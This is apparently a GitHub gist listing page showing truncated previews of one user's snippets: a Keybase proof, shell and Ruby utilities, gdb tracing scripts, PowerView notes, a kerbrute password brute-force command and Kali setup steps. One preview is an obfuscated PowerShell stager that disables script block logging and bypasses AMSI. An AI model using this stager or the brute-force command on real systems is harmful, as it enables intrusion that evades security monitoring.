I hereby claim:
- I am robvinson on github.
- I am robvinson (https://keybase.io/robvinson) on keybase.
- I have a public key whose fingerprint is A820 6BA2 B5A5 D565 5BBD 8F76 50EB 0F9C B6B6 8E33
To claim this, I am signing this object:
#!/bin/sh | |
DSTDIR=80open | |
mkdir $DSTDIR | |
is_empty() { | |
if [ -s $1 ]; then #exists and is not empty | |
return 1 | |
else | |
if [ -f $1 ]; then #file exists and is empty |
#!/usr/bin/env ruby | |
# The trap is guaranteed to happen, and guaranteed to happen only | |
# once, right before the process exits for any reason (unless | |
# it's terminated with a SIGKILL). | |
#trap('EXIT') { acceptor.close } | |
CONTROL = [] | |
CONTROL[0], CONTROL[1] = IO.pipe |
set logging file /tmp/Good-log.txt | |
set logging on | |
attach --waitfor Good | |
### Generic objective-c tracing | |
b objc_msgSend | |
commands | |
silent | |
# print class name and method name | |
printf "-[%s %s]\n", (char *)class_getName(*(long *)$r0,$r1),$r1 |
/* | |
To be used with an output file created by breaking | |
on the encrypt function with gdb, and grabbing it's | |
parameter: | |
attach --waitfor SomeProgram | |
break encrypt | |
commands | |
silent |
#!/usr/bin/env ruby | |
require 'openssl' | |
SHA1 = OpenSSL::Digest::SHA1.new | |
# Verified functionality against | |
# Test Vector (http://tools.ietf.org/html/draft-josefsson-pbkdf2-test-vectors-06#page-3) | |
# Input: | |
# P = "password" (8 octets) |
I hereby claim:
To claim this, I am signing this object:
IF($PSVerSIonTabLE.PSVeRsIon.MAJoR -Ge 3){$GPF=[Ref].ASsemBlY.GETTYpe('System.Management.Automation.Utils')."GEtFIE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLUe($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CollECTIONS.GEnerIc.DICtiONaRY[STriNg,SyStEM.OBJecT]]::NeW();$VaL.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[SCrIPTBLock]."GetFie`LD"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-OBJECt CollectIons.GenERIc.HAshSeT[strINg]))}[REF].AssEMBLY.GEtType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVALuE($nULL,$true)};};[SYStEM.NET.SERVIcePOINtMANaGER]::ExPEcT100CoNTiNue=0;$Wc=NEw-OBJeCt SysTEM.NeT.WebCLIEnt;$u='Mozilla/5.0 (compat |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Convert Debian 10 to Kali Linux on Google Cloud or Any Debian
After you create an account on Google Cloud, and create your VPS using Debian 10, follow the below guide to convert your Debian to Kali Linux Latest Version:
Step 1:
apt-get update -y && apt-get full-upgrade -y && apt-get dist-upgrade -y && apt autoremove -y && apt autoclean